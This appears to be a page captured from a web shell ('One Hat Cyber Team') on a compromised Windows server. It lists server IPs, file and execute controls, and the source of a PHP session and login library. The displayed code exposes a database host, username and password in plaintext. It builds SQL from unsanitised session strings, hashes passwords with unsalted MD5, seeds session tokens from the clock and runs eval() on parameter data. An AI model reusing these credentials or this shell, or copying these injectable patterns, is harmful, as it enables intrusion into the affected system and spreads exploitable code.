One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
htdocs
/
edgpens_220424
/
View File Name :
odbc_212801.php
<?php error_reporting(1); date_default_timezone_set('Asia/Kuala_Lumpur'); $GLOBALS['mysqli'] = new mysqli("172.16.0.67", "edgpens", "c6IRnSzhF87XFGtE", "edgpens"); if ($mysqli->connect_errno) { echo "Failed to connect to MySQL: (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error; exit(); } $mysqli_link = new mysqli("172.16.0.67", "edgpens", "c6IRnSzhF87XFGtE", "edgpens"); if ($mysqli_link->connect_errno) { echo "Failed to connect to MySQL: (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error; } //---------------------------------------------------------------------------------- // Delete a session and return. //---------------------------------------------------------------------------------- function deleteSession($session){ global $mysqli; // $query="DELETE FROM utiliti_session WHERE iduser!=1 AND session = '$session'"; $query="DELETE FROM utiliti_session WHERE session = '$session'"; $mysqli->query($query); return; } //---------------------------------------------------------------------------------- // Update session time if it exists. //---------------------------------------------------------------------------------- function updateSession($session){ global $mysqli; checkSession(); $query="SELECT * FROM utiliti_session WHERE session='$session'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $time=getdate(time()); $s="update utiliti_session set masa='".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."' where session='$session'"; if(!$r=$mysqli->query($s)) echo $s."<br>Fail to updating the session ".$r; }else{ $session=false; } return $session; } //---------------------------------------------------------------------------------- // Log user in. If user already has a session then security risk. Throw them out. //---------------------------------------------------------------------------------- function login($passedusername,$passedpassword){ global $mysqli; checkSession(); $passedpassword= md5($passedpassword); // $query="SELECT * FROM utiliti_user WHERE up_id='$passedusername'"; // $result=$mysqli->query($query) or die(mysqli_error($mysqli)); $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT * FROM user_list WHERE emailUser=?"); // $stmt->prepare("SELECT * FROM user_list"); $emailUser = $passedusername; $stmt->bind_param("s",$emailUser); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $session = array(); $row=$result->fetch_assoc(); if ($row){ $userid = $row['idUser']; $nama = strtoupper($row['nameUser']); $password = $row['passwordUser']; $trkMula = $row['date_start']; $trkTamat = $row['date_end']; $flagUser = $row['flagUser']; if($password==$passedpassword){ if($flagUser == 3){ $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators."; $session[1] = false; $session[3] = 1; }else if($flagUser == 2){ $session[0] = "Ops! Your Login Have Been Blocked.<br>Please Contact System Administrators."; $session[1] = false; $session[3] = 1; // }if(empty($trkMula)){ // $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators."; // $session[1] = false; // $session[3] = 1; // }else if ($trkTamat!='' And $trkTamat<>'0000-00-00' And $trkTamat<date("Y-m-d")){ // $t=strtotime ($trkTamat); // $session[0] = "You Cannot Enter This System Anymore. Started From ".date("d-M-Y",$t); // $session[1] = false; // $session[3] = 1; // }else if ( $trkMula>date("Y-m-d")){ // $t=strtotime ($trkMula); // $session[0] = "You Can Access This System Start From ".date("d-M-Y",$t); // $session[1] = false; // $session[3] = 1; }else {//ok to proceed. $session[0] = "Welcome Back. {$nama}"; $session[1] = checkUser($userid); //check to see if user is already logged in $session[3] = 0; if ($session[1]){ deleteSession($session[1]);//Force the user out if already logged in $session[1]=setSession($userid); }else{ $session[1]=setSession($userid); } } }else{ $session[0] = "Please Try Again!"; $session[1] = false; $session[3] = 1; } }else{ $session[0] = "Please Try Again!"; $session[1] = false; $session[3] = 1; } return $session; } //---------------------------------------------------------------------------------- // Set a session and insert session into session table. //---------------------------------------------------------------------------------- function setSession($userid){ global $mysqli; $time=getdate(time()); $length=80;// set this to the length of session variable desired $session=""; mt_srand(time()); $sessionstring="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $achar=strlen($sessionstring)-1; for ($i=0;$i<$length;$i++){ $session.=$sessionstring[mt_rand(0,$achar)]; } $session=$userid.$session; $query = "INSERT INTO utiliti_session (session,idUser,masa) VALUES ('$session','$userid','".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."')"; $mysqli->query($query) or die(mysqli_error($mysqli)); return $session; } //-------------------------------------------------------------------------------- // Check the user to see if they are already logged in. //-------------------------------------------------------------------------------- function checkUser($userid){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE idUser = '$userid'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $session=$row['session']; }else{ $session = false; } return $session; } //---------------------------------------------------------------------------------- // Log the user out when they click on the log-out button //---------------------------------------------------------------------------------- function logout($session){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session = '$session'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $userid=$row['idUser']; deleteSession($session); return true; }else{ return false; } } //---------------------------------------------------------------------------------- // Check session and return. //---------------------------------------------------------------------------------- function checkSession(){ global $mysqli; $expirationtime=time()-1800; // set this to seconds of inactivity before forced logout (30mins) // $expirationtime=time()-6000; // set this to seconds of inactivity before forced logout (100mins) $time=getdate($expirationtime); $query = "SELECT idUser,session,masa From utiliti_session WHERE masa < '".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."'"; $result=$mysqli->query($query) or die(mysqli_error($mysqli)); while($row=$result->fetch_assoc()){ deleteSession($row[1]); } return; } function growl_me($sess = null,$g_scc){ $type = $g_scc; $msg = (!empty($sess)) ? $sess['success_msg'] : ""; if($g_scc == 1 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } if($g_scc == 2 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } if($g_scc == 3 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } } function get_user($sess){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session='$sess'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); // $stmt->prepare("SELECT * FROM utiliti_session WHERE session=?"); // $running_sql = $sess; // $stmt->bind_param("s",$iduser,$running_sql,$descr); // $stmt->execute(); // $result = $stmt->get_result(); // $row = $result->fetch_assoc(MYSQLI_ASSOC); // $stmt->close(); return $row; } function get_user_full($sess){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session='$sess'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); $query="SELECT * FROM user_list WHERE idUser='{$row['idUser']}'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); return $row; } function mysqli_prepare_audit($sql,$param_type,$param_data,$param_do = null,$query_type = null){ /* Hamdi : 2020-03-20 This Function Only for Insert/Update/Delete use. */ global $mysqli; $user = get_user($_SESSION['session']); $conn = $mysqli; $stmt = $conn->stmt_init(); $stmt->prepare($sql); $comb_param = ""; $length_type = strlen($param_type); $length_data = count($param_data); $type_auto = ""; foreach ($param_data as $a => $b) { $comb_param1 .= "\${$a}=\"{$b}\","; $comb_param2 .= "\${$a}=\"{$b}\",\n"; $type_auto .= "s"; } if($length_type != $length_data || $param_type == 'auto') $param_type = $type_auto; $data = array(); $comb_param1 = substr($comb_param1, 0, -1); $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); if (!$stmt->execute()) { echo 'error executing statement: ' . $stmt->error; $stmt->close(); }else{ $data[0] = $mysqli->insert_id; $stmt->close(); audit_insert($comb_param2,$descr); } return $data; } function mysqli_prepare_all($sql,$param_type,$param_data){ /* Hamdi : 2020-12-07 This Function for All Query. */ global $mysqli; // $user = get_user($_SESSION['session']); $conn = $mysqli; $stmt = $conn->stmt_init(); $stmt->prepare($sql); $comb_param = ""; $length_type = strlen($param_type); $length_data = count($param_data); $type_auto = ""; foreach ($param_data as $a => $b) { $comb_param1 .= "\${$a}=\"{$b}\","; $comb_param2 .= "\${$a}=\"{$b}\",\n"; $type_auto .= "s"; } if($length_type != $length_data || $param_type == 'auto') $param_type = $type_auto; $data = array(); $comb_param1 = substr($comb_param1, 0, -1); $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); $stmt->execute() or trigger_error($stmt->error, E_USER_ERROR); ($result = $stmt->get_result()) or trigger_error($stmt->error, E_USER_ERROR); $stmt->close(); return $result; } function audit_insert($running_sql,$descr = null){ global $mysqli; $user = get_user($_SESSION['session']); $stmt = $mysqli->stmt_init(); $stmt->prepare("insert into audit_trail (idUser,running_sql,descr) values (?,?,?)"); $iduser = $user['idUser']; // $running_sql = $comb_param2; $descr = (empty($descr)) ? '' : $descr ; $stmt->bind_param("sss",$iduser,$running_sql,$descr); $stmt->execute(); $stmt->close(); } function mysql_date($date){ explode('-', $date); return $date[3]."-".$date[2]."-".$date[1]; } // function mysqli_prepare_audit2(){ // global $mysqli; // $stmt = $mysqli->stmt_init(); // $stmt->prepare($sql); // $comb_param = ""; // $length_type = strlen($param_type); // $length_data = count($param_data); // $type_auto = ""; // foreach ($param_data as $a => $b) { // $comb_param1 .= "\${$a}=\"{$b}\","; // $comb_param2 .= "\${$a}=\"{$b}\",\n"; // $type_auto .= "s"; // } // if($length_type != $length_data || $param_type == 'auto') // $param_type = $type_auto; // $data = array(); // $comb_param1 = substr($comb_param1, 0, -1); // $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); // "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; // eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); // $stmt->execute(); // // execute the stored Procedure // $result = $connect->query('call IsUserPresent(@uid, @userCount)'); // // getting the value of the OUT parameter // $r = $connect->query('SELECT @userCount as userCount'); // $row = $r->fetch_assoc(); // } ?>